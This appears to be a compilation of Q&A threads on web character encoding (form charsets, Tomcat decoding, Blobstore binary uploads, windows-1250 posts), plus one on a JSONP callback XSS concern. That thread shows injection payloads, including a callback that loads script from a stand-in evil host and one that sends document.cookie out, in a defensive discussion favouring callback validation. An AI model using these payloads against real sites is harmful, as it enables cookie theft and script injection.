ANSI vs UTF-8 in web Browser - javascript

My requirement is to allow users to use (type) ANSI characters instead of UTF-8 when they are typing into the text fields of my webpages.
I looked at setting the character set in the HTML meta tag
<meta charset="ISO-8859-1">
That was helpful for displaying the content as ANSI instead of UTF-8, but it does not stop users from typing UTF-8 characters. Any help is appreciated.

Let's distinguish between two things here: characters the user can type and the encoding used to send this data to the server. These are two separate issues.
A user can type anything they want into a form in their browser. For all intents and purposes these characters have no encoding at this point, they're pure "text"; encodings do not play a role just yet and you cannot restrict the set of available characters with encodings.
Once the user submits the form, the browser will have to encode this data into binary somehow, which is where an encoding comes in. Ultimately the browser decides how to encode the data, but it will choose the encoding specified in the HTTP headers, meta elements and/or accept-charset attribute of the form. The latter should always be the deciding factor, but you'll find buggy behaviour in the real world (*cough*cough*IE*cough*). In practice, all three character set definitions should be identical to avoid any confusion there.
Now, if your user typed in some "exotic" characters and the browser has decided to encode the data in "ANSI" and the chosen encoding cannot represent those exotic characters, then the browser will typically replace those characters with HTML entities. So, even in this case it doesn't restrict the allowed characters, it simply finds a different way to encode them.
How can I know what encoding is used by the user?
You cannot. You can only specify which character set you would like to receive and then double check that that's actually what you did receive. If the expectation doesn't match, reject the input (an HTTP 400 Bad Request response may be in order).
If you want to limit the acceptable set of characters a user may input, you need to do this by checking and rejecting characters independent of their encoding. You can do this in JavaScript at input time, but you will ultimately need to do it on the server again (since browser-side JavaScript has no influence on what actually gets submitted to the server).
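For example, a minimal client-side sketch (the field id "comment" is hypothetical, and the allowed set here is assumed to be the Latin-1 range; the same check must be repeated server-side):
// Strip anything the ISO-8859-1 repertoire (code points U+0000-U+00FF) cannot
// represent as the user types. This is a convenience only; the server must
// validate the submitted data again.
document.getElementById('comment').addEventListener('input', function () {
  this.value = this.value.replace(/[^\u0000-\u00FF]/g, '');
});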

If you set the encoding of the page to UTF-8 in a meta tag and/or HTTP header, it will be interpreted as UTF-8, unless the user deliberately goes to the View->Encoding menu and selects a different encoding, overriding the one you specified.
In that case, accept-charset would have the effect of setting the submission encoding back to UTF-8 in the face of the user messing about with the page encoding. However, this still won't work in IE, due to the previously discussed problems with accept-charset in that browser.
So it's IMO doubtful whether it's worth including accept-charset to fix the case where a non-IE user has deliberately sabotaged the page encoding.

Related

TOMCAT reporting this error: INFO: Character decoding failed

I have a web application consisting of a client (mainly AngularJS, jQuery and Bootstrap), a servlet (Tomcat) and a database (MySQL).
The user can enter text in a number of places (a sort of free-text form). The client prepares a JSON and sends it to the servlet, which forwards it to the DB, and a response JSON is returned all the way back to the client.
I found a mishandling (causing a "Character decoding failure" in the servlet) when special characters are included in the text. Specifically, I copied text from MS Word and pasted it into the input fields, and the string included some characters that MS Word automatically replaces (e.g. a plain apostrophe with a slanted one - if you just type "I don't know", the ' is replaced by ’), causing the error.
I tried removing control characters using myString=myString.replace(/[\x00-\x1F\x7F-\x9F]/g, "") but with no success.
Could anyone suggest what is the standard practice to properly handle this condition?
Thanks!!!
EDIT:
Here are the lines where the error is being reported (the JSON is quite large, so I'm only showing the relevant sections):
Jul 30, 2016 11:56:29 AM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [request] with value [{...,"Text":"I donֳ¢ֲ€ֲ™t know"..."I donֳ¢ֲ€ֲ™t know"...}] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
Note: further occurrences of Parameter errors will be logged at DEBUG level.
Try changing the encoding of your Tomcat connector. You can find it in conf/server.xml, in a line like this:
<Connector port="8080" URIEncoding="UTF-8"/>
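Note that the curly apostrophe pasted from Word is U+2019, which lies outside both the \x00-\x1F and \x7F-\x9F ranges, so the replace() attempt from the question can never match it. As a complementary client-side workaround (a sketch only; the helper name is made up), common Word punctuation can be mapped back to plain ASCII before the JSON is sent:
// Map the punctuation MS Word substitutes automatically back to plain ASCII.
function normalizeWordPunctuation(s) {
  return s
    .replace(/[\u2018\u2019]/g, "'")   // curly single quotes / apostrophe
    .replace(/[\u201C\u201D]/g, '"')   // curly double quotes
    .replace(/[\u2013\u2014]/g, '-')   // en dash and em dash
    .replace(/\u2026/g, '...');        // horizontal ellipsis
}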

POST data will always be transmitted to the server using UTF-8 charset

POST data will always be transmitted to the server using UTF-8 charset. -jQuery.ajax docs
Does this happen only when you use POST with jQuery (jQuery.post), or also when using <form method=post>?
Content encoding of a form post is consistent with the declared document encoding. For example:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
When a form is submitted, the default enctype is application/x-www-form-urlencoded.
An XHR request can override the setting:
xhr.setRequestHeader('Content-Type','text/xml; charset=utf-8;');
So to answer your question, it is possible to have a form submission in iso-8859-1 while the Ajax call uses UTF-8. Please avoid such a situation, or your server-side code will get messy.
Short answer
In HTML, the charset can be set via the accept-charset attribute on the form. If it is not set, or the given values are not valid, the user agent defaults to the document's charset and then to UTF-8. jQuery does it by setting the Content-Type header on the request.
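As an illustration (the endpoint URL and payload are placeholders): a plain HTML form would declare <form accept-charset="UTF-8" ...>, while with jQuery the charset is stated in the Content-Type it sends:
// jQuery's default is already 'application/x-www-form-urlencoded; charset=UTF-8';
// stating it explicitly makes the submission encoding visible in the code.
$.ajax({
  url: '/api/save',                  // placeholder endpoint
  type: 'POST',
  contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
  data: { text: 'I don\u2019t know' }
});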
Longer answer w/ sources
All HTML forms may have the attribute accept-charset which, as the HTML spec says:
The accept-charset attribute gives the character encodings that are to
be used for the submission. If specified, the value must be an ordered
set of unique space-separated tokens that are ASCII case-insensitive,
and each token must be an ASCII case-insensitive match for one of the
labels of an ASCII-compatible character encoding.
Source, two paragraphs below the big blue thingy.
You may also be interested in §4.10.22.5 Selecting a form submission encoding, emphasis mine:
If the user agent is to pick an encoding for a form, optionally with
an allow non-ASCII-compatible encodings flag set, it must run the
following substeps:
Let input be the value of the form element's accept-charset attribute.
Let candidate encoding labels be the result of splitting input on
spaces.
Let candidate encodings be an empty list of character encodings.
For each token in candidate encoding labels in turn (in the order in
which they were found in input), get an encoding for the token and, if
this does not result in failure, append the encoding to candidate
encodings.
If the allow non-ASCII-compatible encodings flag is not set, remove
any encodings that are not ASCII-compatible character encodings from
candidate encodings.
If candidate encodings is empty, return UTF-8 and abort these steps.
Each character encoding in candidate encodings can represent a finite
number of characters. (For example, UTF-8 can represent all 1.1
million or so Unicode code points, while Windows-1252 can only
represent 256.)
For each encoding in candidate encodings, determine how many of the
characters in the names and values of the entries in the form data set
the encoding can represent (without ignoring duplicates). Let max be
the highest such count. (For UTF-8, max would equal the number of
characters in the names and values of the entries in the form data
set.)
Return the first encoding in candidate encodings that can encode max
characters in the names and values of the entries in the form data
set.
Source
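A rough JavaScript rendering of those substeps (the label table below is a tiny stand-in for the full encoding registry, and the final "count representable characters" comparison is reduced to taking the first usable candidate):
function pickSubmissionEncoding(acceptCharset) {
  // Minimal stand-in for "get an encoding" over ASCII-compatible labels.
  var knownAsciiCompatible = {
    'utf-8': 'UTF-8',
    'iso-8859-1': 'windows-1252',
    'windows-1250': 'windows-1250'
  };
  var candidates = (acceptCharset || '')
    .split(/\s+/)                                  // split input on spaces
    .filter(Boolean)
    .map(function (label) { return knownAsciiCompatible[label.toLowerCase()]; })
    .filter(Boolean);                              // drop labels we cannot resolve
  if (candidates.length === 0) return 'UTF-8';     // empty candidate list -> UTF-8
  return candidates[0];                            // simplification of the max-count step
}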

Upload binary data to AppEngine Blobstore via HTTP request

I'm trying to figure out the lowest data-overhead way to upload/download binary data to Google AppEngine's Blobstore from a JavaScript initiated HTTP request. Ideally, I would like to submit the binary data directly, i.e. as unencoded 8-bit values; maybe in a POST request that looks something like this:
...
Content-Type: multipart/form-data; boundary=boundary;
--boundary
Content-Disposition: form-data; name="a"; filename="b"
Content-Type: application/octet-stream
##^%(^Qtr...
--boundary--
Here, ##^%(^Qtr... ideally represents arbitrary 8-bit binary data.
Specifically, I am trying to understand the following:
Is it possible to directly upload 8-bit binary data, or would I need to encode the data somehow, like a base-64 MIME encoding?
If I use a different encoding, would Blobstore save the data as 8-bit binary internally or in the encoded format? I.e. would a base-64 encoding increase my storage cost by 33%?
Along the same lines: Does encoding overhead increase outgoing bandwidth cost?
Is there a better way to format the POST request so I don't need to come up with a boundary that doesn't appear in my binary data? E.g. is there a way to specify a Content-Length rather than a boundary?
In the GET request to retrieve the data, can I simply expect to have binary data end up in the return string, or is the server going to automatically encode the data somehow?
If I need to use some encoding, which one would be the best choice among the supported options for essentially random 8-bit data? (base-64, UTF-8, something else?)
Even though I received the Tumbleweed Badge for this question, let me report on my progress anyways in case somebody out there does care:
This question turned out to pose 3 independent problems:
Uploading data to BlobStore efficiently
Making sure BlobStore saves it in the smallest possible format
Finding a way to reliably download the data
Let's start with (3), because this ends up posing the biggest issue:
So far I have not been able to find a way to download true 8-bit data to the browser via XHR. Using mime-types like application/octet-stream leads to only 7 bits reaching the client reliably, unless the data is downloaded to a file. The best solution I found is using the following mime-type for the data:
text/plain; charset=ISO-8859-1
This seems to be supported in all browsers that I've tested: IE 8, Chrome 21, FF 12.0, Opera 11.61, Safari 5.1.2 under Windows, and Android 2.3.3.
With this, it is possible to transfer almost any 8-bit value, with the following restrictions/caveats:
Character 0x00 is interpreted as the end of the input string in IE8 and must therefore be avoided.
Most browsers interpret charset ISO-8859-1 as Windows-1252 instead, leading to characters 0x80 through 0x9F being changed accordingly. This can be fixed, though, as the changes are unambiguous. (see http://en.wikipedia.org/wiki/Windows-1252#Codepage_layout)
Characters 0x81, 0x8D, 0x8F, 0x90, 0x9D are reserved in the Windows-1252 charset and Opera returns an error code for these, therefore these need to be avoided as well.
Overall, this leaves us with 250 out of the 256 characters which we can use. With the required basis-change for the data, this means an outgoing-data-overhead of under 0.5%, which I guess I'm ok with.
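For reference, a sketch of the receiving side under those assumptions (the blob is served as text/plain; charset=ISO-8859-1, the browser actually decodes it as Windows-1252, so the code points it reports for bytes 0x80 through 0x9F have to be mapped back):
// Windows-1252 code points mapped back to the original byte values 0x80-0x9F.
var WIN1252_REVERSE = {
  0x20AC: 0x80, 0x201A: 0x82, 0x0192: 0x83, 0x201E: 0x84, 0x2026: 0x85,
  0x2020: 0x86, 0x2021: 0x87, 0x02C6: 0x88, 0x2030: 0x89, 0x0160: 0x8A,
  0x2039: 0x8B, 0x0152: 0x8C, 0x017D: 0x8E, 0x2018: 0x91, 0x2019: 0x92,
  0x201C: 0x93, 0x201D: 0x94, 0x2022: 0x95, 0x2013: 0x96, 0x2014: 0x97,
  0x02DC: 0x98, 0x2122: 0x99, 0x0161: 0x9A, 0x203A: 0x9B, 0x0153: 0x9C,
  0x017E: 0x9E, 0x0178: 0x9F
};
function responseTextToBytes(text) {
  var bytes = [];
  for (var i = 0; i < text.length; i++) {
    var code = text.charCodeAt(i);
    bytes.push(WIN1252_REVERSE[code] !== undefined ? WIN1252_REVERSE[code] : code);
  }
  return bytes;   // values 0-255, excluding the avoided characters listed above
}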
So, now to problem (1) and (2):
As incoming bandwidth is free, I've decided to reduce the priority of solving problem (1) in favor of problems (2) and (3). Turns out, using the following POST request does the trick then:
...
Content-Type: multipart/form-data; boundary=-
---
Content-Disposition: form-data; name="a"; filename="b"
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: base64
abcd==
-----
Here, abcd== is the base64-MIME-encoded data consisting of the above described 250 allowed characters (see http://en.wikipedia.org/wiki/Base64#Examples, GAE uses + and / as the last 2 characters). The encoding is necessary (correct me if I'm wrong) as calling the XHR send() function with String data will result in UTF-8 encoding of the string, which screws up the data received by the server. Unfortunately passing ArrayBuffers and Blobs to the send() function isn't available in all browsers yet to circumvent this issue more elegantly.
Now the good news: The AppEngine BlobStore decodes this data automatically and correctly and stores it without overhead! Therefore, using the base64-encoding only leads to slower data-uploads from the client, but does not result in additional hosting cost (unless maybe a couple CPU cycles for the decoding).
Aside: The AppEngine development-server will report the encoded size (i.e. 33% larger) for the stored blob, both in the admin console and in a retrieved BlobInfo record. The production servers do not have this issue, though, and report the correct blob size.
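Put together, the upload side might look roughly like this (the upload URL is a placeholder obtained from the Blobstore API, and btoa() is used for the base64 step since the raw data string only contains code points 0-255):
function uploadBlob(uploadUrl, rawBytesAsString) {
  // Boundary "-" yields the "---" / "-----" delimiter lines shown above.
  var body =
    '---\r\n' +
    'Content-Disposition: form-data; name="a"; filename="b"\r\n' +
    'Content-Type: text/plain; charset=ISO-8859-1\r\n' +
    'Content-Transfer-Encoding: base64\r\n' +
    '\r\n' +
    btoa(rawBytesAsString) + '\r\n' +
    '-----\r\n';
  var xhr = new XMLHttpRequest();
  xhr.open('POST', uploadUrl, true);
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=-');
  xhr.send(body);
}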
Conclusion:
Using Content-Transfer-Encoding base64 for uploading binary data of Content-Type text/plain; charset=ISO-8859-1, which may not contain characters 0x00, 0x81, 0x8D, 0x8F, 0x90, and 0x9D, leads to reliable data transfer for many tested browsers with a storage/outgoing-bandwidth overhead of less than half a percent. The upload-overhead of the base64-encoded data is 33%, which is better than the expected 50% for UTF-8 (for random 8-bit data), but still far from desirable.
What I don't know is: Is this the optimal solution, or could one do better? Anyone up for the challenge?

Apparent jsonp xss vulnerability

Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability. Wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously for a URL that returns the content type of text/html, this poses a problem wherein the browser renders that HTML and then executes the potentially malicious JavaScript in the onload handler. It could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing. The user checks the domain, sees that it's one he trusts, and so goes ahead and logs in.
But, in our case, we're setting the content type header to application/javascript which causes various different behaviors in different browsers. i.e. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those to be particularly exploitable. The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it. And the IE user is probably going to be confused by the save as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)
Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.
Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However any good JSON encoder would fix that by quoting the double-quote characters.
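For example, JSON.stringify escapes the double quotes, leaving the injected text inert:
JSON.stringify({ comment: 'x"+alert("haxored")+"y' });
// -> {"comment":"x\"+alert(\"haxored\")+\"y"}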
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.
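One way to do that check (a sketch; tighten or loosen the identifier grammar and length cap as needed):
function isSafeJsonpCallback(name) {
  // Letters, digits, _, $ and dots for namespaced callbacks, capped at 64 characters.
  return typeof name === 'string' &&
         name.length <= 64 &&
         /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(name);
}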
Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It is stubborn, and goes to look at the first few bytes of the HTTP response directly, and if it looks kind of like HTML, it will proceed to parse and execute it all as text/html, including inline scripts.
There's nothing to stop them from doing something that inserts code, if that is the case.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except http://example.com/jsonp, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.
As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or eval()s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?

Greasemonkey communication with server that requires windows-1250 encoding

I'm developing a greasemonkey plugin, which is supposed to send a form in background using POST (GM_xmlhttpRequest) on an application not under my control. That application is written in PHP and seems to expect all its input in windows-1250 encoding. What I need to do is to take all the form fields as they are, edit just one of them and resubmit. Some of the fields use accented characters and are limited in length.
Not a problem in theory - I iterate over all form fields, use the encodeURIComponent function on the values and concatenate everything to a post request body. HOWEVER. The encodeURIComponent function always encodes characters according to UTF-8, which leads to all sorts of problems. Because PHP doesn't seem to recode my request to windows-1250 properly, it misinterprets multibyte strings and comes to the conclusion that the resubmitted values are longer than the allowed 40 characters and dies on me. Or the script just dies silently without giving me any sort of useful feedback.
I have tested this by looking at the POST body firefox is sending when I submit the form in a browser window and then resending the same data to the server using xhr. Which worked. For example the string:
Zajišťujeme profesionální modelky
Looks as follows, when encoded by encodeURIComponent:
Zaji%C5%A1%C5%A5ujeme%20profesion%C3%A1ln%C3%AD%20modelky
Same thing using urlencode in PHP (source text in windows-1250) or Firefox:
Zaji%9A%9Dujeme+profesion%E1ln%ED+modelky
Apparently, I need to encode the post body as if it were in windows-1250, or somehow make the server accept UTF-8 (which I doubt is possible). I tried all kinds of other functions like escape or encodeURI, but the output is not much different - all seem to output UTF-8.
Is there any way out of this?
Another way to get Firefox to encode a URL is to set it as the href of a link. The property (NOT attribute) will always read back as an absolute link urlencoded in the page's encoding.
For a GET request you would simply set the href as http://server/cgi?var=value and read back the encoded form. For a POST request you would have to take the extra step to separate the data (you can't use ?var=value on its own because the link reads back as an absolute link).
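A sketch of that trick, assuming the page itself is served as windows-1250 (the URL is a placeholder, and the value must not itself contain URL-special characters such as & or #):
function encodeInPageCharset(name, value) {
  var a = document.createElement('a');
  a.href = 'http://server/cgi?' + name + '=' + value;  // raw, unencoded value
  var absolute = a.href;                               // reads back percent-encoded in the page's charset
  return absolute.slice(absolute.indexOf('?') + 1);    // keep only "name=encodedValue" for the POST body
}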
Let the browser encode the form. Put it in a hidden iframe and call submit() on it.
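A minimal sketch of that approach from a Greasemonkey script (the form selector and field name are hypothetical):
// Retarget the page's own form at an invisible iframe so the browser performs
// the submission, and the windows-1250 encoding, itself.
var frame = document.createElement('iframe');
frame.name = 'gm_hidden_target';
frame.style.display = 'none';
document.body.appendChild(frame);

var form = document.querySelector('form');        // the application's own form
form.target = 'gm_hidden_target';                 // keep the visible page in place
form.elements['comment'].value = 'edited value';  // change just the one field
form.submit();                                    // fields are encoded as windows-1250 by the browser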
